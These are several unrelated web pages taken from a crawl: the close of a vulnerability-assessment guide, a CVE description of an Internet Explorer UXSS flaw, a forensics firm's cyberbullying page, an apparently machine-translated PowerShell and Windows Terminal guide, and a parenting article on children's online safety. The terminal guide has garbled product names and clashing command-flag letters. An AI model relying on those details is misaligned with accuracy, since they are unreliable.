conducted. It also conveys the possible damage that the exploit might cause. - Remediation – This final step involves sealing the security gaps which have been discovered and analyzed. It will usually include a collaboration of security personnel and operations or development teams who will need to decide the wisest approach for mitigation. Measures which might be taken include: - Introducing updated security tools or procedures - Making changes to the configuration or operational methods - Creating and installing security patches This process is ongoing and should never be a one-off. Institutions have to operationalize their procedures and then repeat them regularly in specific intervals. It is also essential to encourage collaboration between development, security and operation teams. The 4 Most Important Steps for Evaluating Vulnerability Here is a proposed four-step method to start an effective vulnerability assessment process using any automated or manual tool. The first step in evaluating vulnerability is to determine your assets and then designate every device’s critical and risk value (which should be determined by client input). An example of this would be the security scanner. It is essential to define the importance of each network device or the ones you intend to test. You’ll also need to know how these devices are accessible by company staff, including administrators. Key factors that will need to be considered include risk tolerance, risk appetite, and treatment. Other factors may consist of device countermeasures, mitigation practices for every device and organizational impact analysis. Baseline System Definition The second thing you’ll need to collect information regarding your systems before the vulnerability evaluation. It would help determine whether the device has services, processes, or ports that are open and shouldn’t be. Furthermore, it is critical to know the software and drivers that have been approved and should be part of the device’s installation and rudimentary configuration. Any perimeter devices should not have default usernames for administrators configured. One way to ascertain the public info accessible depends on configuration baselines is by banner grabbing. Are the devices transmitting logs into the SIEM or Security Information and Event Management system? Have the logs been saved within a centralized repository? Collect all the vulnerabilities and public info for each device platform, the vendor, version, and other pertinent details. Execute Your Vulnerability Scan Now you want to use the correct policy for the scanner to achieve the right results. Before beginning your vulnerability scan, check the compliance requirements determined by your industry, and choose an ideal date and time. Knowing the context of your client industry will help you know when the scan should be performed or whether segmentation is preferable. You’ll need to redefine and then acquire approval to start the scan. To gain the most optimal results, you’ll want to utilize plugins and tools which are related. Examples of these include: - Quick and stealth scans - CMS based web scans like Drupal, Joomla or WordPress - Aggressive scan - Firewall scans - Full scans, which include DDoS (denial of service) attacks - Data standards for payment cards such as PCI DSS - OWASP (Open Web Application Security Project) checks - HIPAA (Health Insurance Portability and Accountability) scans Vulnerability Evaluation Report Creation The 4th and final step is creating the report itself. Pay close attention to details and create additional value during its recommendation phase. To obtain genuine value from your final report, including recommendations determined on your original assessment goals. Furthermore, adding additional risk mitigation procedures dependent on the importance will lead to tremendous long term success. Mention findings that are associated with possible gaps for the baseline system definitions and results. This should include misconfigurations and other significant discoveries. Recommendations for correcting these issues must be thoroughly highlighted. Other things to include in the final report are: - The vulnerability name - Its score is based on CVE (Common Vulnerabilities and Exposures) - The date the vulnerability was discovered. - Details involving affected systems - A comprehensive description of vulnerabilities - The time needed to correct it - How the vulnerability was corrected - PoC (Proof of Concept) regarding system vulnerabilities Once you have this information, the recommended actions phase will showcase a comprehensive understanding of every aspect of your security system. Next Steps: Building a Vulnerability Management Program New vulnerabilities are found daily. Vulnerability management (VM) is a process for identifying, eliminating and controlling vulnerabilities. The vulnerability management programme makes use of specific software and procedures to assist in eradicating discovered vulnerabilities. Scaling the vulnerability management programme is critical to meeting the business’s requirements, complexity, and IT environment. Even the smallest businesses can handle vulnerabilities manually. On the other hand, automation and workflow are advised to assure consistency, compliance (job completion assurance), and cost savings. The vulnerability management maturity model depicted below demonstrates the vulnerability management program’s scalability. A robust cyber security posture necessitates regular vulnerability evaluations. Because of the sheer amount of vulnerabilities and the complexity of the ordinary company’s digital infrastructure, an organization is nearly sure to have at least one unpatched vulnerability that puts it at risk. Finding these flaws before an attacker might mean the difference between a successful attack and a costly and humiliating data breach or ransomware outbreak. One of the best things about vulnerability assessments is that you can perform them yourself and even automate them. You can significantly reduce your cyber security risk by investing in the correct technologies and running frequent vulnerability scans.
<urn:uuid:d17eba0f-0c9b-4d27-a563-0458f3d309db>
CC-MAIN-2024-38
https://www.businesstechweekly.com/cybersecurity/network-security/vulnerability-assessment/
2024-09-13T04:25:37Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651507.67/warc/CC-MAIN-20240913034233-20240913064233-00612.warc.gz
en
0.919019
2,317
2.984375
3
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Cross-site scripting (XSS) vulnerability in Microsoft Internet Explorer 9 through 11 allows remote attackers to bypass the Same Origin Policy and inject arbitrary web script or HTML via vectors involving an IFRAME element that triggers a redirect, a second IFRAME element that does not trigger a redirect, and an eval of a WindowProxy object, aka "Universal XSS (UXSS)." CWE-79 - Cross Site Scripting Cross-Site Scripting, commonly referred to as XSS, is the most dominant class of vulnerabilities. It allows an attacker to inject malicious code into a pregnable web application and victimize its users. The exploitation of such a weakness can cause severe issues such as account takeover, and sensitive data exfiltration. Because of the prevalence of XSS vulnerabilities and their high rate of exploitation, it has remained in the OWASP top 10 vulnerabilities for years.
<urn:uuid:8fb5ecad-598c-452b-b030-c83d841f8066>
CC-MAIN-2024-38
https://devhub.checkmarx.com/cve-details/cve-2015-0072/
2024-09-16T23:26:35Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651714.51/warc/CC-MAIN-20240916212424-20240917002424-00312.warc.gz
en
0.88086
197
3.140625
3
Making complex data simple and compelling From digital device to digital evidence Unlock your vehicle's digital evidence potential Forensic Analysis and Enhancement Investigating and analyzing financial records Gain access to the online accounts of deceased loved ones Clear, precise evidence for a messy world Expert reports to suit your specific needs We can locate people anywhere Stop worrying and learn the truth Prevent, Detect, Respond To Cyberattacks First response is crucial. Every minute counts. The first response is critical to reduce liability Detection & Removing Spyware Services Reduce your electronic risk from digital transmittals Find out who you are really talking to Experienced, Confidential Services Swift, professional incident response Complicated cases require compelling digital facts Find, recover and document digital evidence Bring solid evidence before a judge Cases can be investigated using Social Media Are you being harassed or blackmailed online? We can help you fight back. Individuals, small businesses and large corporations are open to all sorts of online attacks: In such cases, the [...] If you have not spoken out about cyberbullying, today is a great day to do so. June 15, 2018, is designated as Stop Cyberbullying Day, an internationally recognized day of awareness and activities founded by The Cybersmile Foundation in 2012. It takes place the third Friday in June each year. Stop Cyberbullying Day encourages people around the world to show their commitment toward an inclusive, diverse and welcoming online environment for all – without fear of personal threats, harassment or abuse. The hashtag #STOPCYBERBULLYINGDAY is used on social media to show support and to help spread the word. At Digital Forensics Corp., we help people cope with online [...] We’ve all heard the horror stories about cyberbullying. Online bullies, often acting anonymously, pick a target and never let up. They harass, they make threats, they spread rumors on social media. They make their targets feel rejected, isolated, excluded. It can lead to despair, depression and anxiety, which sometimes can contribute to suicidal behavior. It is hell to deal with, and too many families know this pain all too well. Many families find themselves wondering how to avoid cyberbullying. How common is cyberbullying in the United States? Here are some [...] Speak to a Specialist Now Get Help Now
<urn:uuid:0bddff31-12de-412b-b8bb-7b1d06c4d6b9>
CC-MAIN-2024-38
https://www.digitalforensics.com/blog/tag/online-harassment/
2024-09-19T11:25:33Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652028.28/warc/CC-MAIN-20240919093719-20240919123719-00112.warc.gz
en
0.933647
499
2.609375
3
Terminal, console, and shell are important components of PowerShell that allow users to interact with the Windows operating system through commands and scripts. PowerShell provides a powerful interface to manage the system and perform various tasks, helping to increase productivity and efficiency. A terminal is a text-based interface that allows a user to enter commands and receive responses from the operating system. It is the starting point for interacting with PowerShell, where the user can run commands and view the results. The console is a window that displays the results of executed commands, error messages, and other important information. It provides a convenient way to view results and interact with the command shell. A command shell (interpreter) is software that executes commands and scripts entered by the user in a terminal or console. PowerShell has its own command shell that allows you to perform various tasks such as managing files, registries, services, network and much more. In the PowerShell Terminal, Console, and Shell Guide, we’ll cover the basic commands and features that will help you get comfortable working with PowerShell. You’ll learn about different ways to interact with the shell, including running scripts, running commands in the background, and more. Our guide will help you quickly learn the basics of PowerShell and become more confident in using this powerful tool. In the previous section, we talked about the command line mode in Windows and the two different command shells of this operating system, mentioned about working in terminals and console applications. For effective and convenient work in the command line, it is important to choose the right tool, and for this you need to clearly understand what these terms mean. The word itself comes from the verb terminate and means “terminal device”, that is, a device that is at one end in the process of communicating with another device (server). The task of the terminal is to send text entered from the keyboard to the server and output text responses from the server. The first terminals in the 1950s and 1960s were connected via telephone lines to large computers. These were electric typewriters (teletypewriters, TT U). Teletypewriters typed commands and server responses were printed line by line on a roll of paper (Fig. 2.1). Later, instead of a printer, computer terminals began to use the device itself with a built-in keyboard and monitor called a console. The word console appeared long before the invention of computers and meant a bracket or a stand for something. Then consoles with buttons and switches for controlling electrical devices began to be called consoles (Fig. 2.2). Thus, a console is a device, and a terminal is a communication program inside the console that performs the following tasks: Recognition and acceptance of characters typed by the user on the keyboard. Forming a single line from received characters, taking into account control codes (for example, moving the cursor or deleting a character). Exchange of text with a computer using communication equipment through a direct physical connection or communication lines. Displays the text received from the computer on the display. The terminal must recognize and process the so-called ANSl exit codes to set the format, color and other parameters of the text output (for example, moving the cursor to an arbitrary position on the screen). This mechanism, when a terminal sends characters to a program running on a computer and displays the text received from this program on the screen, remains to this day the basic model of human-computer interaction through the command line. Since the mid-1980s, hardware consoles and terminals have been superseded by personal computers and are now terminals and terminals in operating systems. salts are called software analogues of TTU. These are programs that allow you to enter character commands, send those commands to another process, and display strings of text from that process. Commands coming from the terminal are executed by a special program called a command shell. Depending on the received command, the shell performs certain actions and generates strings of characters that are sent back to the terminal for display on the screen. For each operating system, there are different shells that differ in the set of commands. In systems (Linux and macOS) they are most often used with bash, zsh, fsh, tsh shells. Windows 10, as we saw in Chapter 1. There are two standard shells: cmd.exe (command line) and Windows PowerShell. It is important to understand that command shells do not have their own user interface, they are not terminals. You can work with the same shell using different terminals, and different shells can be launched from the same terminal. A terminal and a shell are two applications running on the same computer that need to exchange text with each other. In such cases, this problem is solved with the help of a pseudo-terminal (Pseudo TT U, RTU), which provides two virtual devices: a slave and a master. A terminal application is connected to the main pseudo-device. And the command shell or another console application to the remote. When the terminal application sends characters to the input of the master device, they are redirected to the output of the slave device. Lines of text formed by a shell or application are sent to the input of the slave device and redirected to the output of the master device (Fig. 2.3). At the same time, the slave device emulates the behavior of the hardware terminal, selecting certain control combinations of symbols from the input stream and sending signals corresponding to these combinations to the connected application. This mechanism has been in use since the 1980s, supporting the operation of terminology applications (including full-screen console devices that allow for control over In Windows, terminal emulation is implemented differently. Recall that all modern versions of Windows are descendants of the original Windows NT operating system, developed by Microsoft in the early 990s. Work in the command line mode in Windows NT was carried out using the Windows Console plug-in associated with the cmd.exe shell (command interpreter). This standard console has continued to be used in Windows for almost 30 years. Functionally, the Windows console terminal (ConHost) is similar to the traditional one, but arranged differently, without the use of an RTU pseudo-terminal. If the user wants to work with the command line in, he first starts a terminal. which establishes a connection to the default shell. In Windows, the user does not run the terminal itself (starting with Windows 7, it is represented by the file conhost.exe), but an executable file with a shell (cmd.e.xe or powershell.exe) or another console utility (Fig. 2.4). At the same time, the operating system automatically connects this shell or utility to the existing IЈII and the new instance of the ConHost console. At the same time, the ConHost process interacts with the shell using system messages (I/O Control messages, IOCTL messages) through a special driver, and not through text streams through a PTY pseudo-terminal, as in UNIX systems. Therefore, the mechanism for supporting console programs in Windows has significant differences from the approach adopted in UNIX systems. For any command shell or command line utility running, the Windows operating system always assigns the standard ConHost console (conhost.exe) as the terminal. Communication channels between the console and utilities are created by the operating system itself. Command-line utilities interact with the console by calling functions from the Win32 console API, such as setting the text and background color, moving the cursor to the desired position, and so on. These architectural features of the Windows console have become a source of problems over time. It is difficult to create alternative terminal software for Windows. The developers of such applications (pay attention here to the SopEti, Cmder, Console2, Hyper terminal emulators) had to launch a standard Windows console in a window outside the field of view of the monitor, send the characters entered by the user to it, and then read the lines returned by the shell from this window and display them in its own window. About Mapsole’s Win32 APIs, which use Win32 functions to work with the console, are difficult to port to other platforms where the console is controlled via a symbolic This inconsistency in handling Tayuke’s console makes porting to Windows difficult. Windows 10 supports the Windows Subsystem for Linux (WSL), which allows you to install one of the Linux distributions inside Windows and use shells and standard utilities from that operating system. At the same time, control messages coming from these utilities may be processed incorrectly in the Windows console. You are having problems making Windows command line connections to the server from remote terminals on other computers. After all, in this case, you need to remotely call Win32 Console API functions, and the client machine may not work under Windows. To solve such tasks, Microsoft developers added the SoptRTU pseudo-console infrastructure to Windows in 2018, while maintaining backward compatibility with the traditional ConHost. ConHost now fully supports utilities that use UTF-8 encoding and ANSI sequences to control the terminal (due to this, for example, full-screen files run in a WSL session are correctly displayed in the Windows console). In addition, it is now possible to create alternative terminals for Windows that work through SopRTU. In 2019, Microsoft introduced a new and improved terminal for Windows called Windows Terminal. It is open source software (source code hosted on GitHub: https://github.com/microsoft/terminal), which is actively developed and positioned by Microsoft as the main tool for working with various shells and command line utilities in modern versions of Windows. Tab support to open multiple shell sessions in a single window. Division of the window into several independent panels, in which you can open different sinks. The presence of a panel for entering or selecting a command to control the terminal. Support for controlling the display of text in the terminal. Full UTF-8 encoding support. Using 24-bit color. Support for graphical themes and translucent backgrounds in the terminal. Support for different display modes of the terminal window. Select the hyperlink in the text displayed in the terminal. Copy text to the system clipboard in HTML and RTF formats. The easiest way to install Windows Terminal is from the Microsoft Store (you can open it using a shortcut in the Start menu or in a browser using the link https://wyvw.microsoft.com/ru-ru/store/apps/windows) (Fig. 2.5). Other installation options are described in the terminal repository on GitHub (https:// github.com/microsoft/terminal). After installation, a Windows Terminal shortcut will appear in the Start menu. To launch the terminal, you can use the Windows terminal shortcut in the “Start” menu or press the key combination <Win> + <R> and enter the name of the wt file of the terminal startup in the “Run” window. A new Windows PowerShell terminal window will open (see Figure 2.6). Let’s take a look at the new features of Windows Terminal that were not present in the previous terminal. To create a new tab with the PowerShell shell, you need to click on the + icon or press Ctrl+Shift T If you click on the v icon, a list will open where you can choose a different profile (command shell) for the new tab (Fig. 2.7): Standard command line Command Prompt (cmd.exe interpreter); The bash shell of the Linux operating system (if the WSL subsystem is installed and configured). The window in each tab can be divided into several panels, both vertically and horizontally. This allows you to view multiple command line sessions simultaneously without having to switch between tabs (see Figure 2.8). Split vertically opens a new panel to the right of the selected panel and splits horizontally below the selected panel. You can use keyboard shortcuts to divide the window into panels If several panels are open in the tab, you can switch between them either with the mouse or with the arrow keys while holding down the <Alt> key. You can resize the panels by holding <Alt>+<Shift> and using the arrow keys. Various terminal control commands can be executed not only using key combinations, but also entered or selected in the command palette, which is called by pressing the keys <Ctrl>+<Shift>+<p> (Fig. 2.9). To start a new instance of Windows Terminal from the command line, use the wt command. At the same time, with the help of additional command arguments, you can set the current directory in which the terminal will be opened, automatically create new tabs or split the tab into several panels. Terminal commands are separated by semicolons. For example, the following command: wt -d С:\ ; split-pane -р ’’Windows PowerShell” ; split-pane -H wsl.exe It will launch a new terminal with three panels on a tab: First, in the root C:\ opens the default profile, PowerShell (command -d C: \). Then the panel is split vertically and PowerShell is opened in the right half in the user’s home directory (command split-pane -r “Windows PowerShell”) Finally, the right pane is split horizontally, and the bottom half opens the WSL subsystem’s bash interpreter (split-pane -n wsl.exe command). A description of other arguments that can be specified when starting the terminal can be found in the documentation on the Microsoft website (https://docs.microsoft.com/ruru/windows/terminal/command-line-arguments). Hardware terminals allowed communication between computers through the command line at the very beginning of the computer era. Before the advent of personal computers, consoles were used to work with servers in the command line mode – devices with a built-in keyboard and monitor, in which a software analogue of the terminal was launched. A terminal program allows you to enter character commands, sends them to another process, and displays lines of text coming from that process. Commands coming from the terminal are executed by the command shell. Shells do not have their own user interface. For a personal computer, a terminal and a command shell are two programs running on the same computer that need to exchange text with each other. You can work with the same shell using different terminals, and different shells can be launched from the same terminal. Windows includes two command shells: the standard cmd command line and Windows PowerShell. Windows uses the ConHost console as a standard terminal to which the operating system automatically connects a running shell or console application. Alternatively, you can install an enhanced Windows Terminal on Windows. This is an open source application that is actively developing and is positioned by Microsoft as the main tool for working with command line shells in modern versions of Windows. Thanks to our team of volunteers for providing information from open sources.
<urn:uuid:7765fbde-441c-4e59-b3bb-8700b5231d44>
CC-MAIN-2024-38
https://hackyourmom.com/en/osvita/chastyna-2-znajomymosya-z-powershell-terminal-konsol-ta-komandna-obolonka/
2024-09-20T17:26:38Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725701419169.94/warc/CC-MAIN-20240920154713-20240920184713-00012.warc.gz
en
0.913093
3,098
3.671875
4
We are living in a world where technology is seamlessly integrated into every facet of our lives and ensuring the safety of our children in the online world has become an essential concern. The internet has undoubtedly revolutionized how we access information, communicate, and learn, offering unprecedented opportunities for growth and exploration. However, it also presents a lot of risks and challenges, particularly for young individuals who may be less equipped to navigate the complex landscape of the online realm. Why is it important to protect your child online? The concept of online safety for children extends far beyond just limiting screen time or installing parental controls. It encompasses a comprehensive approach that involves educating children about potential risks, fostering open communication, setting boundaries, and equipping them with the tools and knowledge to make responsible choices in their digital interactions. As children increasingly engage in online activities, such as social media, online gaming, and educational platforms, the need to establish a robust framework for their identity protection becomes even more critical. Because as parents we all hope for the best for our kids, and our desire is to keep them in a safe and friendly environment. But do we know enough about the potential risks waiting in the web storage? In this article, we will discuss all of the potential threats and how to protect your children online as much, as possible. Statistics regarding online threats against children The digital world is not without its perils, and the statistics are a stark reminder of the challenges that children face in the online realm. Cyberbullying, exposure to inappropriate content, online predators, and other threats have become disturbingly prevalent. The National Center for Missing and Exploited Children (NCMEC) reports a steady rise in cases related to online exploitation and child endangerment. According to a survey conducted by the Pew Research Center, 59% of U.S. teens have experienced some form of online harassment, highlighting the pervasive nature of cyberbullying. Another study from the Crimes Against Children Research Center found that one in seven youngsters received unwanted sexual solicitations online, that fact is creepy and disgusting. These alarming figures underscore the urgent need for active protection measures to safeguard children's online experiences. Awareness and Communication Nowadays, to protect your children online it is essential to create awareness and promote dialogue regarding the risks present on the internet. To ensure their safety, we need to play a role in equipping them with the necessary understanding and resources to navigate the online environment responsibly. One key aspect is educating children about the significance of protecting their personal information. Instilling the understanding that their child's personal information is a precious commodity and should be shared only with trusted individuals and sources helps to establish a foundation of caution. Encouraging them to be vigilant about the information they divulge on online accounts, social media sites, and chat rooms can fortify their defenses against potential threats. Equally important is cultivating responsible online behavior at a young age. Teaching kids to think critically and question the authenticity of online information can help them discern between safe and risky online interactions. Nurturing a sense of digital citizenship involves encouraging children to treat others online with kindness and respect, mirroring the same values as they would in the physical world. Engaging in open dialogue about the potential dangers they might encounter, such as interacting with strangers in chat rooms, can empower children to make informed decisions and report any uncomfortable experiences. By promoting a culture of awareness and communication, parents and guardians create a supportive environment where children can safely explore the digital realm while staying vigilant against online threats. It is our responsibility protecting children online and reveal all these scary aspects of their online activities, because the internet can be a very dangerous place. The importance of educating children about online risks Teaching kids to recognize and navigate potential dangers, such as interacting with strangers online, is akin to arming them with a protective shield. It is crucial to empower children with the understanding of how to differentiate between interactions and potential threats, like online predators or online bullies. By having discussions about the importance of protecting information and the possible outcomes of sharing it with strangers, parents and educators can provide children with the necessary knowledge to make informed choices and remain cautious while navigating the digital realm. Furthermore, instilling a sense of digital literacy and responsible online behavior from an early age can shape the way children engage with technology and how this process will reflect in the future. Teaching kids to be critical thinkers and encouraging them to question the authenticity of online information cultivates a healthy skepticism that can help them avoid falling victim to scams or misinformation. Keeping your children safe online requires revealing to them strategies to handle online bullying, or harassment empowering them to seek help and report such incidents, and fostering a supportive kid's safe online environment. Ultimately, informing our kids about online risks isn't about instilling fear but rather about nurturing their ability to make safe and informed choices, thereby ensuring their digital experiences are enriching and secure. Open and consistent communication with children regarding their online activities Maintaining open and consistent communication with children about their online activities is a cornerstone of nurturing a safe and responsible digital presence. Engaging in conversations that talk openly about the benefits and potential risks of the online world allows parents to guide and support their kids effectively. Establishing family rules and guidelines that teach kids about the importance of safeguarding personal details and adhering to responsible online behavior can lay a strong foundation for their online interactions. By involving children in discussions about setting boundaries and respecting privacy, parents can teach them to make thoughtful decisions while navigating the digital realm. One crucial aspect of this communication is addressing the potential exposure to inappropriate content. Parents can initiate age-appropriate discussions about the types of content children may come across online and teach them how to handle such situations. Creating an atmosphere where kids feel at ease sharing their encounters and worries promotes trust and empowers parents to provide guidance in dealing with inappropriate content. By nurturing communication channels, parents can stay connected to their children's experiences, offer timely advice, and guarantee that their online activities are both educational and secure. To Protect Your Child Online Set Up Parental Controls and Privacy settings. Keeping your child safe online involves establishing controls and privacy settings. By adjusting the security settings on devices and platforms, we as parents can have a level of influence over the content and interactions that our children come across. Initiating an open conversation with our children about these measures is equally vital. Talking openly about the reasons behind setting up parental controls and the family rules in place helps children understand the importance of online safety and the boundaries established to protect them. Teaching kids about personal details and the significance of keeping sensitive information private further enhances their awareness of potential online risks. In addition to parental controls, utilizing security software can provide an added layer of protection. Installing reputable security software can help filter out harmful content, monitor online activities, and prevent unauthorized access. A few tips for all of the parents include staying informed about the latest security features offered by devices and platforms, regularly reviewing and adjusting privacy settings, and staying engaged in ongoing conversations with their children about their online experiences. By combining parental controls, privacy settings, and open communication, parents can effectively create a digital space where their children can explore and learn while enjoying a safe and secure online journey. What are the benefits of parental control software? Parental control software offers a variety of advantages for modern families striving to create a secure and nurturing online environment. With the ever-expanding digital landscape, these tools provide an invaluable means to establish and maintain effective security settings tailored to each child's age and maturity. Many parents find solace in knowing that such software acts as a virtual guardian, enabling them to set ground rules and enforce limitations on the types of content their children can access. This not only helps shield young minds from accessing inappropriate content or harmful material, but also cultivates a sense of responsible online behavior from an early age. Another significant benefit lies in the opportunity for parents to actively engage in open discussions about internet safety. Parental control software serves as a catalyst for dialogues about the importance of adhering to established rules and understanding the rationale behind these measures. By involving children in the decision-making process and explaining the purpose of the security settings, parents foster a sense of responsibility and accountability. Moreover, these tools offer peace of mind, enabling parents to strike a balance between allowing their children to explore the digital realm and ensuring their safety. As children learn to navigate the online landscape with the guidance of parental control software, they develop essential skills for being safe online and gain the confidence to seek help from a trusted adult whenever they encounter unfamiliar or uncomfortable situations. In this way, parental control software not only keeps children safe online, but also empowers them to become responsible digital citizens. How to install and configure parental controls on different devices? Installing and configuring parental controls on different devices is a proactive step towards keeping your child safe online and ensuring their digital experiences align with the family values. When it comes to mobile devices, each platform offers specific methods to establish and customize these safeguards. For smartphones and tablets, parents can explore the device's settings to locate the parental controls section. Here, they can often set restrictions on app downloads, limit online access during specific hours, and even filter out inappropriate content. By enabling these controls, parents can strike a balance between granting their children the benefits of mobile technology while implementing online safety tips that shield them from potential risks. For computers, both Windows and macOS operating systems come equipped with built-in parental control features. These allow parents to manage web browsing, set time limits for online activities, and monitor usage patterns. On popular web browsers, extensions and add-ons can be installed to further enhance parental controls, providing options to block specific websites or filter search results. Additionally, gaming consoles offer parental control settings that limit gameplay time, restrict access to certain games based on age ratings, and prevent interactions with strangers during online gaming sessions. By delving into the settings of each device, parents can tailor the level of control to suit their children's needs and developmental stages, thus ensuring a safer and more enriching digital experience. Social media platforms' privacy settings and how to adjust them Social media platforms privacy settings play a pivotal role in protecting children online in the increased online presence and ensuring their digital experiences remain secure. As kids online are drawn to social networking sites and interact with others through their mobile devices, it becomes crucial for the parents to be well-versed in adjusting these settings to create a protective digital environment. Explaining the age limits associated with different platforms is a crucial starting point, because there is a lot of inappropriate content in all the sites and games. Many social media platforms have minimum age requirements to sign up, which are designed to protect younger users from potential risks and inappropriate content. Parents can engage in meaningful conversations with their children about these age restrictions and the reasons behind them, promoting an understanding of responsible online behavior. To adjust privacy settings for child's personal information on social media platforms, parents can guide their children through the process step by step. Begin by accessing the account settings, where options to control who can view posts, send friend requests, or access personal information are often available. Teach children to set these options to "friends only" or "private" to restrict access to their posts and details. Additionally, instruct them to carefully review and manage their friend list, ensuring they only connect with individuals they know and trust in real life. On mobile devices, installing social media apps with built-in privacy controls can offer an added layer of security. Regularly reviewing and updating these settings, along with encouraging open communication about online experiences, empowers children to navigate social media platforms safely and responsibly, contributing to a positive and secure digital presence. Teach Online Safety practices. Teaching online safety practices is an essential responsibility in today's digital realm, especially as kids interact with various platforms, including social networking sites. Parents and educators play a crucial role in imparting valuable knowledge about the intricacies of safe online interactions. Clarifying the reasons behind these restrictions helps children understand the importance of adhering to them and fosters a sense of responsible online behavior from an early age. Engaging children in discussions about safety features provided by different platforms is equally vital. Educate them about the significance of utilizing privacy settings to control who can access their information and posts. Emphasize the importance of reporting any instances of online bullying or inappropriate content, fostering a culture of empowerment and accountability. Encourage open conversations about their online experiences, ensuring children feel comfortable sharing concerns and seeking guidance whenever needed. By imparting these online safety practices, parents equip children with the tools to navigate the digital world confidently while fostering a respectful and secure online environment. Educating children about strong and unique passwords Informing your children about the importance of strong and unique passwords is an indispensable component of their digital literacy journey. As children engage in various online activities, such as internet use, online purchases, and social interactions, understanding the significance of password security becomes paramount. One fundamental principle to emphasize is the avoidance of using a default password. Default passwords, often set by manufacturers or platforms, can be easily exploited by cybercriminals seeking unauthorized access to personal accounts. By teaching children to replace default passwords with their own, a critical step towards enhancing online security is taken. Furthermore, instilling the practice of creating strong and unique passwords helps shield children's personal information, including personal details or school projects, from potential breaches. Encourage them to craft passwords that combine a mix of uppercase and lowercase letters, numbers, and symbols while avoiding easily guessable information, such as birth dates or names. Stressing the importance of using different passwords for different online accounts is equally vital. To ensure that if one account is ever compromised, it doesn't give cyber criminals access to other accounts, it's important to teach children about password security. By giving them this knowledge, parents empower them to use the internet securely and responsibly, protecting their online activity and personal information from potential dangers. Understanding and avoiding phishing attempts Understanding and effectively avoiding phishing attempts is a crucial skill in today's interconnected digital realm, where our kids engage in diverse online activities across various devices. One common method that cybercriminals employ is the use of deceptive pop-ups. These seemingly innocuous windows may prompt users to enter personal information, often in the guise of urgent messages or enticing offers. Teaching our kids, especially children who are active on online devices like mobile phones, to exercise caution and never provide personal information in response to pop-ups is paramount. Encouraging skepticism and the habit of verifying the legitimacy of such requests can thwart potential phishing attacks and safeguard sensitive information. Children, who may be particularly vulnerable to online predators, can greatly benefit from understanding the concept of phishing and recognizing the tactics used by malicious actors. By fostering a comprehensive understanding of phishing attempts and nurturing a discerning approach to online interactions, kids can cultivate a safer online experience across their various online activities and devices. Recognizing and reporting suspicious behavior or content Recognizing and promptly reporting suspicious behavior or content is a critical aspect of keeping children safe online as they engage in various activities across different online devices. As kids immerse themselves in the digital realm, particularly in online games and other forms of online activity, educating them about the importance of vigilance is essential. One particular concern is the presence of predators on the internet. These individuals may take advantage of games and other platforms to target children. It is crucial to teach kids how to recognize signs of behavior, such as when someone asks for information or an online predator tries to arrange an in-person meeting. By doing this, we can provide our children with the tools they need to identify threats and take proper actions to restrict them. It's important for children to understand that they should report any incidents like these to a trusted adult, whether it's a parent, teacher, or another authority figure. This approach encourages a sense of responsibility and accountability among children, ensuring that they actively participate in their safety. By nurturing this awareness and cultivating a culture of reporting, parents and educators contribute to a safer digital environment where children can explore, learn, and communicate while avoiding potential risks, such as identity theft or interactions with toxic individuals. Limit Screen Time and Establish Technology-Free zones. Limiting screen time and creating designated technology-free zones at home are essential strategies for promoting a healthy and balanced lifestyle, especially in a world where mobile phones and other devices are ubiquitous. Nowadays, a lot of parents understand the significance of setting boundaries on the amount of time kids spend in front of screens. It's important for children to have a range of activities beyond digital interactions. By establishing rules about when and how long devices can be used, parents can encourage their children to explore their interests, engage in physical activities, and interact with the world around them. Additionally, involving kids in conversations about screen time limits helps them develop a sense of responsibility and self-control, empowering them to make decisions regarding their use of technology. Creating technology-free zones within the home further supports the goal of achieving a harmonious balance between digital engagement and offline experiences. These designated spaces, such as the dining room or bedrooms, provide opportunities for genuine human interactions and quality family time without the distractions of screens. Just as other parents have discovered, having specific areas where devices are not allowed cultivates an environment where meaningful conversations and bonding can flourish. This approach reinforces the idea that there is a time and place for technology while also nurturing the development of interpersonal skills and promoting mental well-being. By incorporating these practices, families can effectively manage screen time, encourage holistic growth, and forge deeper connections among family members in today's digital age. Creating tech-free zones within the home, such as during meals or before bedtime In the midst of our fast-paced digital lives, creating tech-free zones within the home has emerged as a valuable practice to foster meaningful human interactions and promote overall well-being. Designating specific times, such as during meals or before bedtime, as moments free from the intrusion of mobile devices and screens, offers a sanctuary where family members can connect, engage in genuine conversations, and truly savor the present moment. By setting boundaries around mealtimes, families can relish in shared culinary experiences without the distractions of checking notifications or feeling the urge to post online. This simple yet impactful practice promotes a sense of togetherness and mindfulness, allowing everyone to unwind and engage in unhurried, face-to-face conversations. The hours leading up to bedtime provide another opportune moment to establish a tech-free zone. Encouraging the habit of putting away mobile phones and avoiding screens before sleep can significantly improve sleep quality and promote a peaceful transition into restful slumber. As research shows, the blue light emitted by screens can disrupt the body's natural sleep-wake cycle, making it harder to fall asleep. By designating a technology-free period before bedtime, kids can engage in calming activities such as reading, reflecting, or engaging in gentle stretches, all of which contribute to a more restorative and rejuvenating night's sleep. Embracing tech-free zones during these crucial times not only nurtures deeper connections and quality rest but also reinforces the importance of balance in our increasingly digitally connected lives. Encourage Responsible Social Media Usage Encouraging responsible social media usage among your kids is a fundamental aspect of nurturing their digital well-being. As kids increasingly engage in online activities and manage their own online accounts, guiding them towards a thoughtful approach to social media is essential. Emphasize the significance of maintaining a positive online reputation, reminding them that the content they share can have lasting effects on their digital identity. Teach them the value of being mindful about the information they post, the photos they share, and the interactions they engage in, as these aspects collectively contribute to shaping their online presence. By instilling the importance of responsible social media usage from an early age, parents can empower their children to navigate the digital landscape with awareness, integrity, and a sense of digital citizenship. Discussing the potential consequences of oversharing personal information online Engaging in conversations, with your children regarding the consequences of sharing too much personal information online is a vital step in their digital education. By discussing the risks associated with revealing details like their location, school or identifiable information parents can help their kids grasp the importance of protecting their privacy. Emphasize that not everyone they encounter on the internet may have intentions and talk about the dangers of coming across an online predator who could exploit their child's personal data. Empower your children by educating them about being cautious with what they share and who they interact with online, as this plays a role in online behavior and ensures they navigate the digital world confidently and securely. Promoting good digital citizenship and respectful behavior on social media platforms Promoting good digital citizenship and fostering respectful behavior on social media platforms is a cornerstone of guiding our children's online interactions. By explaining the significance of treating others with kindness and empathy, parents can help their kids navigate the complexities of virtual relationships. Encourage your children to think before they post anything, comment, or engage in direct messaging, reminding them that their words can impact others in different ways. Discuss the potential consequences 